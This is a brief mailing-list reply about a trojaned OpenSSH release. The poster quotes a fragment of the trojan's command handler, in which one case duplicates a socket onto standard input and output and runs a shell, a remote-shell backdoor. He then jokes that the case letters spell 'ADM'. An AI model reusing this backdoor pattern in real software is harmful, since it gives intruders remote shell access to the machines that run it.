Mailing List Archive

Re: OpenSSH trojan! I KNOW WHO DID IT!
I may know who did it. Let's look at code:

switch(c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s,0);
dup2(s,1);
dup2(s,2);
a[0]=i_val;
a[1]=NULL;
execve(a[0],a,NULL);

break;
case 'M':
alarm(0);
sig(0);
break;
default:

There are 3 options: Which makes up to A+D+M=ADM :-)))))))
ADM is back ? great eheheh.

--
Evrim ULU
evrim@envy.com.tr / evrim@core.gen.tr
sysadm
http://www.core.gen.tr